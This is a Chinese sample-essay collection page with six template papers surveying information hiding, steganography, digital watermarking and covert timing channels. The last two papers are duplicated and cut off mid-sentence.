美章网 精品范文 隐藏技术论文范文

隐藏技术论文范文

隐藏技术论文

隐藏技术论文范文第1篇

关键词:信息安全 信息技术 信息隐藏 隐写术

目前,随着因特网的普及、信息处理技术和通信手段的飞速发展,使图像、音频、视频等多媒体信息可以在各种通信网络中迅速快捷的传输,给信息的压缩、存储、复制处理等应用提供了更大的便利。同时,也为信息资源共享提供了条件,目前网络已经成为主要的通讯手段。各种机密信息,包括国家安全信息、军事信息、私密信息(如信用卡账号)等都需要通过网络进行传输,但互联网是一个开放的环境,在其上传输的秘密关系着国家安全、经济发展和个人稳私等方方面面的安全,所以信息安全在当今变得越来越重要。

信息安全的类型

信息安全主要有两个分支:加密技术和信息隐藏。

加密技术(Cryptography)已经为人们所熟悉,广泛应用于各行各业。加密技术研究已有多年,有许多加密方法,但是由于加密明确的告知用户,此文件或其他媒介已经进行过加密,窃密者必将利用各种破解工具进行破解,得到密文。虽然加密长度和强度一再增加,但破解工具也在加强。并且由于计算机性能的飞速发展,使解密时间缩短,所以加密术的使用局限性已见一斑。

信息隐藏,信息隐藏可以追溯到公元1499年,它的历史久远。但是直到20世纪90年代,在IT界,人们才赋予了它新的内容,使之成为继加密技术之后,保护信息的又一强有力的工具。信息隐藏与传统的信息加密的明显区别在于,传统的加密技术以隐藏信息的内容为目的,使加密后的文件变得难以理解,而信息隐藏是以隐藏秘密信息的存在为目标。所以科学技术的发展使信息隐藏技术在信息时代又成为新的研究热点。它既发扬了传统隐藏技术的优势,又具有了现代的独有特性。对于研究信息安全方向的学者而言,研究信息隐藏是很有意义的,也是刻不容缓的。

信息隐藏的相关研究

在信息隐藏的研究中,主要研究信息隐藏算法与隐蔽通信。在信息隐藏算法中,主要有空间域算法和变换域算法。最典型的空间域信息隐藏算法为LSB算法,最典型的变换域算法是小波变换算法。由于LSB算法的鲁棒性比较差,相关的研究改进工作都是提高其鲁棒性。对于小波变换算法,由于小波变换具有良好的视频局部特性,加上JPEG2000和MPEG4压缩标准使用小波变换算法取得了更高的压缩率,使得基于小波的变换的信息隐藏技术成为目前研究的热点。一般根据人类的视觉特点,对秘密信息用一定的比例进行小波压缩,压缩过程增加了数据的嵌入容量。然后量化小波系数并转换为二进制流数据。对载体信号同样进行小波变换,选择适当的小波系数及嵌入参数嵌入信息。因为小波有几十种,每种小波的特性不同,参数的选取也不同,所以必须通过实验,筛选出隐蔽性较好、容量较大的方法,从而使不可感知性、鲁棒性与容量三者之间达到平衡。另外,还可以先对偶数点的小波系数与之相邻的两点的小波系数的平均值来替换,这个平均值称为插值,作为秘密数据嵌入的位置。

信息隐藏的实施阶段

一般而言,信息隐藏是分为四个阶段:预处理阶段、嵌入阶段、传输阶段和提取阶段。为了使每个阶段都达到安全,所以必须在预处理阶段,引入加密术中的加密算法。在嵌入阶段,使用基于小波的隐藏信息的算法,在传输阶段,进行隐蔽通信,从而使用传输阶段也是安全的。所以这套信息隐藏的处理方案,将形成一个安全的体系,因此即能隐藏秘密信息的内容,也能隐蔽通信的接收方和发送方,从而建立隐藏通信。

信息隐藏的应用范围

信息隐藏的优势决定了其具有广泛的应用前景,它的应用范围包括:电子商务中的电子交易保护、保密通信、版权保护、拷贝控制和操作跟踪、认证和签名等各个方面。信息隐藏主要分为隐写术和数字水印,数字水印技术主要用于版权保护以及拷贝控制和操作跟踪。在版权保护中,将版权信息嵌入到多媒体中(包括图像、音频、视频、文本),来达到标识、注释以及版权保护。数字水印技术的应用已经很成熟。信息隐藏的另一个分支为隐写术,隐写术的分类的依据不同:可以按隐写系统结构分类:分为纯隐写术、密钥隐写术和公钥隐写术;按隐写空间分类:可以分为信道隐秘、空域隐写、变换域隐写;按隐写载体分类可以分为文本隐写、语音隐写、视频隐写和二进制隐写。

信息隐藏技术的现实意义

在网络飞速发展的今天,信息隐藏技术的研究更具有现实意义。将加密技术融合到信息隐藏技术中来,并将信息隐藏中的子分支数字水印中的经典算法加以改进也融合进信息隐藏技术,使整个信息隐藏过程达到理论上的最高安全级别。所以基于算法的隐蔽通信研究具有不可估量的现实意义。

信息隐藏技术是近几年来国际学术界兴起的一个前沿研究领域。特别是在网络技术迅速发展的今天,信息隐藏技术的研究更具有现实意义。目前,为保证数据传输的安全,需要采用数据传输加密技术、信息隐藏技术、数据完整性鉴别技术;为保证信息存储安全,必须保证数据库安全和终端安全。信息安全的研究包括两个主要研究方向:信息加密与信息隐藏。在信息安全的研究理论体系和应用体系中,密码技术已经历了长期的发展,形成了较完整的密码学理论体系,有一系列公认的、经典的可靠的算法,然而,在现代信息科学技术的条件下的信息隐藏,虽然可以追溯到公元前,但其完备的理论体系还尚未建立。信息隐藏与传统的信息加密有明显的区别,传统的密码术以隐藏信息的内容为目的,使加密后的文件变得难以理解,而信息隐藏是以隐藏秘密信息的存在为目标。

作为网络环境中的新的信息安全技术,信息隐藏方法的研究及应用在学术和军事、政务方面倍受关注,国际上已经召开了几届信息隐藏学术会义,国际会议先后在1996年在英国剑桥、1998年在美国波特兰、1999年在德国雷斯顿,2001年在美国匹兹堡召开。信息隐藏方面的研究越来越深入。另外,在国际上,剑桥大学、IBM研究中心,NEC美国研究所、麻省理工学院等许多科研单位都成立了专门的部分进行这一领域的研究。欧洲委员会也对相应的研究项目进行深入研究。国际化标准组织也提出了MPEG-4的框架,允许方便的将视频编码与加密技术和水印技术结合起来。

在国内,对信息隐藏也给予了高度重视。中国科学院自动化所、清华大学、北京大学、北京邮电大学网络安全中心等都与国际同步正在进行许多高水平的研究。1999年在我国何德全院士、周仲义院士、蔡吉人院士与有关应用研究单位在北京联合发起召开了我国第一届信息隐藏学术会议,2000年在北京,2001年在西安、2002年在大连分别举行了会议。在2004年,广州中山大学举行了全国第五届信息隐藏学术年会,在2006年,将在哈尔滨工业大学举行第六届信息隐藏学术年会。另外,在2004年国家自然科学基金课题中,信息工程大学的平建西教授申请了信息隐藏的国家自然科学基金课题并得到了资助。

信息隐藏的计算和技术实施策略

在信息隐藏算法中,主要有空间域算法和变换域算法。最典型的空间域信息隐藏算法为LSB算法。LFTurnet与RGVan利用LSB算法将信息隐藏在音频和数字图像中。Bender提出了通过修改调色板统计信息来嵌入秘密数据库的隐藏算法。Patchwork方法采用随机技术选择若干对像素,通过调节每对像素的亮度和对比度来隐藏信息,并保证这种调整不影响图像的整体观感。丁玮从数字图像的透明叠加方法出发,提出了基于融合的数字图像信息隐藏算法。并根据七巧板的游戏原理,提出了隐藏数字图像的Tangram算法,Marvel将数字图像看作嗓声,提出了空间域中的扩频数据隐藏方法。Lippman使用信号的色度,提出了在国家电视委员会的色度信道中隐藏信息的方法。Liaw和Chen提出了将秘密图像嵌入到载体图像中的灰度值替方法,为了适合灰度值替换,Wu和Tsai提出了使用图像差分的改进方法;Wu和Tsai还在人类视觉模型的基础上,提出了在数字图像中嵌入任何类型数据的数据隐藏方法;Tseng和Pan提出了一种安全的、大容量的数据隐藏算法;Provos通过随机嵌入和纠错编码的方法改进了信息隐藏的性能,Solanki等从信息论的角度出发,将视觉标准引入到通过量化来嵌入信息的方法,并由此提出了一种高容量的信息隐藏算法。

在变换域算法中,正交变换的形式可以有离散傅立叶变换(DFT),离散余弦变换(DCT),小波变换(Wavelet)等。由于变换域算法利用了人眼对于不同空间频率的敏感性,在适当的位置嵌入信息具有更好的鲁棒性和不可觉察性。容量也较高,所以变换域隐藏算法比空间域算法复杂。

最具代表性的变换域算法是Cox在1995年提出的扩频算法。Andreas Westfel和Pitas分别提出了通过模拟图像水平或者垂直移动将秘密数据嵌入到图像的DCT系统的数据隐藏算法,管晓康提出了Pitas算法的改进算法,克服了该算法中嵌入数据量小的缺点。丁玮成功地将该算法修改并在小波域中运算该算法,并通过置乱技术改进了Pitas算法中的随机数策略,消除了误判的可能性。

Cabin提出了数据隐藏的信息论模型,并引入了概念e-安全。如果载体信号和载密信号的概率分布的相关熵小于e,那么称数据隐藏系统是e安全的。如果e=o,那么数据隐藏系统是绝对安全的。Mittelholzer从信息论的角度出发,提出了数据隐藏算法,并以互信息来描述数据隐藏算法的安全性与鲁棒性。Shin在Cabin信息论模型的基础理论上,提出了在任何满足条件的载体数据中嵌入秘密数据的绝对安全的一次哈希数据隐藏算法。Zollner等提出的安全模型也是利用信息理论来衡量数据隐藏系统的安全性。Sunlivan也从信息论的角度出发,对数据隐藏的安全性进行了分析。

隐藏技术论文范文第2篇

【关键词】信息隐藏 安全 技术

多媒体技术和通信技术带来极大方便,但数字化的多媒体信息很容易受到非法访问、篡改、复制和传播,给人们的生产生活及生命财产带来隐患。魔高一尺道高一丈,信息隐藏技术应运而生。

一、信息隐藏技术及其特征

信息隐藏技术利用载体数据的冗余性以及人的感官局限性,将一个特定信息隐藏在另外一个被称为载体的信息中。信息隐藏技术融合电子工程、计算机科学、信号处理、通信、多媒体技术等多学科,是新兴技术体系。信息隐藏所用载体可以是文本、图像、音频、视频,甚至可以是某个信道或某套编码体制。信息能够隐藏在载体中,载体数据本身具有很大的冗余性,未压缩的多媒体信息编码效率是很低,将某些信息嵌入到该载体信息中进行秘密传送完全可行,不会影响多媒体信息本身的传送和使用;人的感觉器官对于所接收信息都有一定掩蔽效应,如人耳对不同频段声音敏感程度不同,可将信息隐藏到载体中而不被觉察。

信息隐藏技术的特征明显:不可察觉性,嵌入信息后,要求不会引起载体发生可感知变化;不可检测性,嵌入隐藏信息后,计算机不能发现和检测;安全性,嵌入信息后,必须拥有相关信息才能够提取所嵌入内容;纯正性,提取操作时,即便载密文件受到损压缩、解压缩、滤波、转换等扰动,也能提取隐藏信息;稳定性,隐藏信息能“永久”存在;安全性,第三方在不知道隐藏算法和隐藏密钥情况下,不能获取信息相关数据。信息隐藏技术按载体分为,基于文本、图像、音频、视频、超文本、网络层、图形等媒体的信息隐藏技术;按嵌入域分为基于空域(或时域)和变换域的隐藏技术;按嵌入策略分为替换调制、模式调制和扩频叠加调制等技术;按提取要求分为盲隐藏技术和非盲隐藏技术;按作用分为隐蔽通信和数字水印技术;按密钥分为无密钥隐藏和有密钥隐藏。

二、信息隐藏技术的研究及演进

信息安全事关个人利益,也事关国家安全、社会稳定以及经济发展,各国政府无不重视信息和网络安全。密码技术一直是保障信息安全的重要手段,但这并不能解决问题。截获者发现网络文件加密,往往会引起注意,并激发其破解欲望,即使不能成功破解,也能轻易拦截并破坏秘密信息,干扰通信进行。针对密码技术的局限性,上世纪90年代国际上出现了信息隐藏技术(InformationHiding)。

现代信息隐藏研究主要集中在静态图像领域,目前信息隐藏所用载体已扩展到文字、图像、声音及视频等领域。在全球信息化、数字化迅猛发展时代背景下,对知识产权保护、隐密通信等需求激发了对信息隐藏技术的研究热潮。国际上研究信息隐藏的机构主要有剑桥大学、麻省理工学院、NEC美国研究所、IBM研究中心等,已提出了一些优秀隐藏算法。我国于1999年在何德全、周仲义、蔡吉人等三位院士大力倡导下召开了第一届信息隐藏学术研讨会,我国对信息隐藏的研究也取得重要成果。目前在信息隐藏中无论是数字水印还是隐密通信,都得到越来越广泛应用。应用领域不断扩大,从最初静态图片发展到文本、音频、视频、电脑文件、流媒体、网页及网络传输中的数据包,甚至是无线通信领域中的语音通信和手机彩信等领域。我国对信息隐藏的研究取得了很多成果,基本与世界水平保持一致。如今信息隐藏研究已出现百花齐放、百家争鸣局面。

三、信息隐藏技术的应用

随着信息技术飞速发展,人类利用的信息越来越丰富,通信技术发展使人们能够方便、快捷、灵活地使用文本、语音、图像与视频等多种方式通信;各种数字化信息处理技术使得网络中传输任何类型的文件(如文本、图像、音频和视频等)都可被数字化,极大方便了对各种信息数据压缩、存储、复制、处理和利用。

信息隐藏技术主要有隐写术和数字水印。目前,信息隐藏技术的应用主要在以下方面:一是隐密通信。通过隐写术将秘密信息嵌入在公开媒体文件中传播消息。早期的隐密通信,接收方和发送方甚至不必交换电子邮件,直接交互文件或登录特定计算机和账户。随着网络及通信技术发展,隐密通信所用通信方式从简单数据文件交互到互联网以及无线通信领域。二是版权保护。通过数字水印技术在媒体文件中嵌入特定数字标识或签名,标识媒体文件所有权和版权信息等。三是数据完整性保护。防护篡改、完整性保护中所采用的数字水印为易损水印或脆弱水印,任何对媒体文件修改都会从隐藏数据中反映出来。四是印刷品防伪。印刷品印刷之前嵌入一定标识信息,印刷后作品可经过扫描再次输入计算机,通过特定水印提取和鉴别方法来鉴别作品真伪。五是拷贝控制。控制媒体文件拷贝次数,防止大规模盗版或非法复制。

信息隐藏技术重点运用领域是移动通信领域。移动通信网络方便快捷,在军事和商业通信中广泛应用。移动通信领域多媒体短信将文本、图片、音频、视频等组合成多媒体消息进行发送。移动通信领域中多媒体短信以其特有的直观性、生动性和集成性,面市以来得到广泛关注。多媒体短信即彩信的最大特色是支持多媒体功能,可将不同的媒体,如文本、图片、音频、视频等组合在一起进行发送。彩信标准并没有对彩信所支持的文件格式给出具体限制,理论上只要在封装打包时为彩信所包含的各媒体文件设置好适当类型参数即可;但实际上具体的彩信所支持媒体格式还是有限的,这主要与手机终端彩信软件和MMSC支持传送媒体格式有关。随着3G普及以及手机终端行业发展,彩信所支持的媒体文件格式将更丰富多样,为信息隐藏技术在彩信中的应用提供了更为广阔的空间。

【参考文献】

[1]刘宏.信息隐藏技术在遥感影像中的应用.信息工程大学硕士学位论文,2008.

隐藏技术论文范文第3篇

关键词:信息安全,信息隐藏

 

一、关于信息隐藏

所谓的信息隐藏,是利用媒体信息普遍存在的冗余特性,将秘密信息隐藏在其他媒体信息中,其首要目标就是使加入隐藏信息后的媒体目标的质量下降,尽可能地小,使人无法觉察到隐藏的数据,或者知道它的存在,但未经授权者无法知道它的位置。并不像传统加密过的文件一样,看起来是一堆会激发非法拦截者破解机密资料动机的乱码,而是看起来和其它非机密性的一般资料无异,因而十分容易逃过非法拦截者的破解。其道理如同生物学上的保护色,巧妙地将自己伪装隐藏于环境中,免于被天敌发现而遭受攻击。被人们誉为历史学之父的古希腊历史学家希罗多德(Herodotus, 486―425),在其著作中讲述了这样一则故事:一个名叫Histaieus的人筹划着与他的朋友合伙发起叛乱,里应外合,以便推翻波斯人的统治。他找来一位忠诚的奴隶,剃光其头发并把消息刺在头皮上,等到头发又长起来了,把这人派出去送“信”,最后叛乱成功了。

信息隐藏技术是20世纪90年代中期从国外兴起的一门集多学科理论与技术与一身的新兴技术领域,它涉及感知科学、信息论、密码学等多个学科领域,涵盖信号处理、扩频通信、图像处理等多种专业技术的研究方向。

人的眼睛或耳朵本身对某些信息都有一定的掩蔽效应,利用人的这些特点,可以很好地将信息隐藏而不被察觉。信息隐藏过程一般由密钥来控制,通过嵌入算法将有意义的信息即嵌入对象隐藏于掩护对象中,从而生成隐密载体,隐密载体通过信道传输到接受端。在密钥的控制下采用特定的提取算法从隐藏载体中提取出嵌入对象,利用密钥从中恢复或检测出隐藏的秘密信息,从而使用户获得真实可靠的信息。使非法者不知道这个载体信息中是否隐藏了其它的信息,而且即使知道,也难以提取隐藏的信息,从而实现信息的保密。

据目前已经提出的信息隐藏算法,从它们对载体的修改方式上进行分类,可以分为:时域(空域)替换技术、变换域技术、扩展频谱技术、统计方法等等。

二、信息隐藏的特点

利用不同的媒体进行信息掩藏时有着不同的特点,但是它们都必须具有下列基本特征。

1.隐蔽性。指嵌入信息后在不引起秘密信息质量下降的前提下,不显著改变掩护对象的外部特征,即不引起人们感官上对掩护对象变化的察觉。以使非法拦截者无法判断是否有秘密信息的存在。

2.不可测性。指隐蔽载体与原始载体具有一致的特性,即非法拦截者要检测到秘密信息的存在并提取出来应相当困难,至少在秘密信息的有效期内是不可能的。

3.不可见性。利用人类视觉系统和听觉系统的属性,经过一系列隐藏处理, 使目标资料没有明显的降质现象,而隐藏的资料却无法人为地看见或听见.

4.鲁棒性。指不因图像文件的某种改动而导致隐藏信息丢失的能力。这里所谓“改动”包括传输过程中的隐藏载体对一般的信号处理(如滤波、增强、重采样、有损压缩等)、一般的几何变换(如平移、旋转、缩放、分割等)和恶意攻击等情况,即隐藏载体不会因为这些操作而丢失了隐藏的秘密信息。

5.自恢复性。论文大全。指经过了一些操作和变换后,可能会使隐蔽载体受到较大的破坏,如果只留下部分的数据,在不需要宿主信号的情况下,却仍然能恢复隐藏信息的特征就是所谓的自恢复性。

6.安全性。指隐藏算法有较强的抗攻击能力,即它必须能够承受一定程度的人为攻击,而使隐藏信息不会被破坏。

三、信息隐藏的应用

在信息安全领域中,信息隐藏技术的应用可归结为下列几个方面。

1.数字知识产权保护

知识产权保护是信息隐藏技术中数字水印技术和数字指纹技术所力图解决的重要问题,信息隐藏技术的绝大部分研究成果都是在这一应用领域中取得的。随着网络和数字技术的快速普及,通过网络向人们提供的数字服务也会越来越多,如数字图书馆、数字图书出版、数字电视、数字新闻等。这些服务提供的都是数字产品,数字产品具有易修改、易复制、易窃取的特点,因此,当前的数字知识产权保护就已经成为迫切需要解决的实际问题。

信息隐藏技术应用于版权保护时,所嵌入的签字信号通常被称作“数字水印”,数字水印技术可以成为解决此难题的一种方案。现在越来越多的视频信号、音频信号和数字图像中被贴上了不可见的标签,用以防止非法拷贝和数据跟踪。服务提供商在向用户发送产品的同时,将双方的信息代码以水印的形式隐藏在作品中,这种水印从理论上讲应该是不被破坏的。论文大全。当发现数字产品在非法传播时,可以通过提取出的水印代码追查非法散播者。其主要特点是版权保护所需嵌入的数据量小,对签字信号的安全性和鲁棒性要求很高。

2.数据完整性鉴定

使用数字水印技术有一定的缺陷,用于数字水印技术保护的媒体一旦被篡改水印就会被破坏,从而很容易被识别。在数字票据中隐藏的水印经过打印后仍然存在,可以通过再扫描回数字形式,提取防伪水印,以证实票据的真实性。数据完整性鉴定是指对某一信号的真伪或完整性的判别,并需要进一步指出该信号与原始真实信号的差别,以确认资料在网上传输或存储过程中并没有被篡改、破坏或丢失。假定接收到一个如音频、视频或图像等多媒体信号,并初步判断它很可能是某一原始真实信号的修改版本,数据篡改验证的任务就是在对原始信号的具体内容不可知的情况下,以最大的可能判断是否是真实的。首先,要充分利用数据库管理系统提供的数据完整性的约束机制和各种输入数据的引用完整性约束设计,以便保证数据完整、准确的输入和储存。其次,在数据传输过程中可视情况选用相应的数据校验方式对传输数据进行校验检查。

3.数据保密

在网络上传输秘密数据要防止非法用户的截获和使用,这是网络安全的一个重要内容,随着信息技术的发展以及经济的全球化,这一点不仅涉及政治、军事领域,还将涉及到商业、金融机密和个人隐私。信息隐藏技术为网上交流的信息采取了有效的保护,比如电子政务中敏感信息、电子商务中的秘密协议和合同、网上银行交易的重要数据、重要文件的数字签名以及个人隐私等,还可以对一些不愿为别人所知道的内容使用信息隐藏方式进行隐藏储存,从而使数据得到保密,保证了信息的安全性。论文大全。

4.资料不可抵赖性的确认

在网上交易中,交易双方的任何一方不能抵赖自己曾经做出的行为,也不能否认曾经接收到对方的信息,这是交易系统中一个重要环节。这可以使用信息隐藏技术,在交易体系的任何一方发送和接收信息时,将各自的特征标记形式加入到传递的信息中,这些标记应是不能被去除的,从而达到确认其行为的目的。

结论

总之,信息隐藏技术是多媒体通信和多媒体信号处理领域中近年来新兴的研究方向,它为信息安全提供了一种新的思路,为我们研究信息安全提供了一个新的方向.

目前国际上先进的信息隐藏技术已能做到隐藏的信息可以经受人的感觉检测和仪器的检测,并能抵抗一些人为的攻击。但总的来说,信息隐藏技术尚没有发展到可实用的阶段,使用密码加密仍是网络信息传输的主要安全手段。虽然目前对信息隐藏的研究有了很大的进展,在信息安全中起到了重要的作用,但存在大量的实际问题亟待解决,如信息隐藏的容量问题,如何建立不可感知性的数学度量模型,信息隐藏的容量上界如何计算等;信息隐藏的对立面――隐藏分析如何得到同步发展;如何对信息隐藏进行分析和分类;如何找到信息隐藏技术自己的理论依据,形成完善和科学的理论体系等等。

信息隐藏是一项崭新的技术领域,也是多媒体技术、网络技术研究的前沿,应用前景十分广阔,必将吸引广大图像、语音、网络、人工智能等领域的研究者加入到这一行列,从而推动信息安全技术更快的发展。

参考文献:

[1] 张作林,陈建华.基于区域的信息隐藏技术[J].福建电脑,2005,3.

[2] 张书真.信息安全中的信息隐藏技术[J].电脑知识与技术.2005,18.

[3] 陈 波,谭运猛,吴世忠.信息隐藏技术综述[J].计算机与数字工程.2005,2.

[4] 左伟明,秦姣华.信息隐藏技术研究[J].湖南城市学院学报.2005,3.

[5] 江早.信息隐藏――种崭新的信息安全技术[J].中国图象图形学报.2005,2.

隐藏技术论文范文第4篇

通常人们认为对信息加密就可以保证通讯的安全,但是在网络传输中仅仅使用加密技术通常是不够的。现代密码学开发出来的加解密系统不管是对称密钥系统(如DES),还是安全性更高的公开密钥系统(RSA),经过加密算法处理所生成的密文具有随机性、不可读,反而明确提示了保密信息的存在,因而很容易引起监控者的注意,并以此为依据进行对密文的破译或对发送者和接收者的攻击。采用加密技术的另一个潜在缺点是随着计算机硬件的迅速发展,具有并行计算能力的破解技术的日益成熟,仅通过增加密钥长度来达到增强安全性已不再是唯一的可行方法。因此,近年来国际上出现了信息隐藏技术,它是一种不同于密码术的技术,它在电子商务中安全体系中必将起到重要作用。

一、信息隐藏技术的含义与方法

信息隐藏技术(Information Hiding),也称作数据隐藏(Data Hiding),它是集多学科理论与技术于一身的新兴技术领域。信息隐藏技术主要是指将特定的信息嵌入数字化宿主信息(如文本、数字化的声音、图像、视频信号等)中,它的目的不在于限制正常的信息存取和访问,而在于保证隐藏的信息不引起监控者的注意和重视,从而减少被攻击的可能性,在此基础上再使用密码术来加强隐藏信息的安全性,因此信息隐藏比信息加密更为安全。应该注意到,密码术和信息隐藏技术不是互相矛盾、互相竞争的技术,而是相互补充的技术,他们的区别在于应用的场合不同,对算法的要求不同,但可能在实际应用中需要互相配合。特定的信息一般就是保密信息,信息隐藏的历史可以追溯到古老的隐写术,但推动了信息隐藏的理论和技术研究始于1996年在剑桥大学召开的国际第一届信息隐藏研究会,之后国际机构在信息隐藏领域中的隐写术、数字水印、版权标识、可视密码学等方面取得大量成果。

信息隐藏是一个十分活跃的研究领域,虽然其载体可以是文字、图像、语音或视频等不同格式的文件,但使用的方法没有本质的区别。因此,下面将以信息隐藏技术在图像中的应用即遮掩消息选用数字图像的情况为例进行说明。

在图像中应用的信息隐藏技术基本上可分为两大类:时域法或频域法。时域法就是直接改变图像元素的值,一般是在图像的亮度或色带中加入隐藏的内容。这种方法比较有代表性的是最不重要比特位(the Least Significant Bits,LSB)方法,该方法也是最早被应用的信息隐藏方法。遮掩消息的LSB直接被待隐消息的比特位或两者之间经过某种逻辑运算的结果所代替。LSB算法的主要优点是可以实现高容量和较好的不可见性。但是该算法容易被第三方发现并得到,遭到破坏,而对图像的各种操作如压缩、剪切等,都会使算法的可靠性受到影响。为了增强算法的性能,提出了各种改进的方法,如利用伪序列,以“随机”的顺序修改图像的叠像技术(LSM);在使用密钥的情况下,才能得到正确的嵌入序列等。频域法是利用某种数学变换,将图像用频域表示,通过更改图像的某些频域系数加入待隐信息,然后再利用反变换来生成隐藏有其他信息的图像。各种不同的数学变换都可以被使用,目前已有的方法主要集中在小波变换、频率变换、DCT(低频分量)变换等。 二、信息隐藏技术在电子商务中的应用

目前信息隐藏技术在电子商务中的应用主要体现在以下几个方面:

1.数据保密

在具体电子商务活动中,数据在Internet上进行传输一定要防止非授权用户截获并使用,如敏感信息、谈判双方的秘密协议和合同、网上银行交易中的敏感数据信息、重要文件的数字签名和个人隐私等等。另外,还可以对一些不愿为别人所知道的内容使用信息隐藏的方式进行隐藏存储。

2.数据的不可抵赖性

在网上交易中,交易双方的任何一方不能抵赖自己曾经做出的行为,也不能否认曾经接收到的对方的信息,这是交易系统中的一个重要环节。这可以使用信息隐藏技术中的水印技术,在交易体系的任何一方发送或接收信息时,将各自的特征标记以水印的形式加入到传递的信息中,这咱水印应是不能被去除的,可达到确认其行为的目的。

3.防伪

商务活动中的各种票据的防伪也是信息隐藏技术的用武之地。在数字票据中隐藏的水印经过打印后仍然存在,可以通过再扫描回数字形式,提取防伪水印,以证实票据的真实性。

4.数据的完整性

对于数据完整性的验证是要确认数据在网上传输或存储过程中并没有被窜改,可通过使用脆弱水印技术保护的媒体一旦被窜改就会破坏水印,从而很容易被识别。

隐藏技术论文范文第5篇

1研究背景理论意义

网络通信的安全极为重要,早年大家是通过对网络信息的加密处理来保护信息的安全,但是随着计算机技术的不断发展破译技术已经很成熟,早年用密文加密对手段已经没有办法保证信息的安全,要知道信息一旦被破译有可能不仅仅是财产损失,很多个人信息也会无法受到保护,由此就产生了信息的隐蔽方法。

1.1隐蔽通信技术在国内外的现状与发展趋势

信息隐蔽技术是通过对信息进行处理然后通过信道进行信息的传送,就是通过载体把信息变为隐蔽信息载体。目前的隐蔽通本文由论文联盟收集整理信技术研究还是基于数字认证安全和版权的认证,另一方面就是对信息的加密。早在上世纪80年代美国就信息安全问题下达过信息安全指令,而我国在1999年也下达了相同的指令,学者表示通过网络数据流来隐蔽通信技术是可以实施的,隐蔽通信技术也就此成为了研究热议的话题。

1.2网络流隐蔽通信技术的优势

网络数据不是静态的而是动态的,从出现到消失人们都难以捕捉,很多黑客也无法拦截到准确的信息,这是网络数据的优势之一,可以利用其动态的特性。

网络世界报传送的信息量是十分巨大的,每分每秒都有数以万计的网络数据包在传送,利用网络数据包来隐蔽通信技术很可行,它有自身独特的特性和优势,可以保护信息安全。

1.3隐蔽通信技术存在的问题和研究目的

传统的隐蔽通信技术很容易被检测器检测出来,只有对协议进行分析就很容易发现隐蔽信道,所以传统的隐蔽通信技术隐藏能力低。通过算法可以估计信道内信息传输量,传统的信息隐蔽技术通过数据包头可以隐蔽的信息量很少,所以隐蔽通信技术还存在信息容量小的问题。而我们研究的目的就是为了提高信息的存储量,提升信息容量的算法就是当务之急,并且研究目的也在于提高网络流对信息通讯的隐蔽性。

2隐蔽通信信道的探究

2.1时间信道的报文延迟

在tic通道中,传递符号“0”的时间为si0,传递符号“1”的时间为si1。下面我们分别从信道容量和平均传递时间两方面讨论影响信息传送的因素。在实际网络中,报文的延迟时间是变化的,从而导致了同一报文发送间隔会对应多种可能的报文到达间隔。对一发送间隔而言,到达时间间隔将分布在以该发送间隔为中心一段区域内。到达间隔分布越集中,解码中的误码率越低,信道容量就越大。

2.2隐蔽信道存在的必要条件

隐蔽信道是隐蔽在网络通信下的另一种通信方式,它

的存在就是问了实现隐蔽通信。隐蔽信道是可行的,从信息理论角度,信息的输出和输入是有着必然的联系,隐蔽信道从正常的输入端输入,隐蔽信息的接收方从正常的信道接收这样就可以实现信息的隐蔽,其中必须具备以下的条件;(1)传送放和接收方的共享资源属性和权限必须相同;(2)必须能够控制传送方和接收方之间的通信,能够调节传输的顺序;(3)必须满足时间特性双方都参考一个时钟。网络时间信道可以作为载体把传送方和接收方联系起来,传送者改变报文时间特性接收者可以第一时间检查出被改变的时间报文对其进行解读。

2.3隐蔽时间信道特性分析

计算机网络中传输的相邻报文往往是不在相同的网络环境下,所以在网络传送的时间上是有差别的,根据相邻报文的时间差来接收隐蔽的通信信息是隐蔽信息技术的有效途径之一,但是相邻报文的传送存在一定的误码率,所以要最大限度的提升信息容量,隐蔽信息技术必须提高对网络环境的抗干扰能力。信息隐藏算法中主要有两种算法,其中有空间域算法,其中最具代表性的就是lsb算法。对于扩展时间信道的容量我们必须加强对算法的研究。

2.4信息隐藏技术对现代的意义

隐藏技术论文范文第6篇

1研究背景理论意义

网络通信的安全极为重要,早年大家是通过对网络信息的加密处理来保护信息的安全,但是随着计算机技术的不断发展破译技术已经很成熟,早年用密文加密对手段已经没有办法保证信息的安全,要知道信息一旦被破译有可能不仅仅是财产损失,很多个人信息也会无法受到保护,由此就产生了信息的隐蔽方法。

1.1隐蔽通信技术在国内外的现状与发展趋势

信息隐蔽技术是通过对信息进行处理然后通过信道进行信息的传送,就是通过载体把信息变为隐蔽信息载体。目前的隐蔽通本文由收集整理信技术研究还是基于数字认证安全和版权的认证,另一方面就是对信息的加密。早在上世纪80年代美国就信息安全问题下达过信息安全指令,而我国在1999年也下达了相同的指令,学者表示通过网络数据流来隐蔽通信技术是可以实施的,隐蔽通信技术也就此成为了研究热议的话题。

1.2网络流隐蔽通信技术的优势

网络数据不是静态的而是动态的,从出现到消失人们都难以捕捉,很多黑客也无法拦截到准确的信息,这是网络数据的优势之一,可以利用其动态的特性。

网络世界报传送的信息量是十分巨大的,每分每秒都有数以万计的网络数据包在传送,利用网络数据包来隐蔽通信技术很可行,它有自身独特的特性和优势,可以保护信息安全。

1.3隐蔽通信技术存在的问题和研究目的

传统的隐蔽通信技术很容易被检测器检测出来,只有对协议进行分析就很容易发现隐蔽信道,所以传统的隐蔽通信技术隐藏能力低。通过算法可以估计信道内信息传输量,传统的信息隐蔽技术通过数据包头可以隐蔽的信息量很少,所以隐蔽通信技术还存在信息容量小的问题。而我们研究的目的就是为了提高信息的存储量,提升信息容量的算法就是当务之急,并且研究目的也在于提高网络流对信息通讯的隐蔽性。

2隐蔽通信信道的探究

2.1时间信道的报文延迟

在tic通道中,传递符号“0”的时间为si0,传递符号“1”的时间为si1。下面我们分别从信道容量和平均传递时间两方面讨论影响信息传送的因素。在实际网络中,报文的延迟时间是变化的,从而导致了同一报文发送间隔会对应多种可能的报文到达间隔。对一发送间隔而言,到达时间间隔将分布在以该发送间隔为中心一段区域内。到达间隔分布越集中,解码中的误码率越低,信道容量就越大。

2.2隐蔽信道存在的必要条件

隐蔽信道是隐蔽在网络通信下的另一种通信方式,它

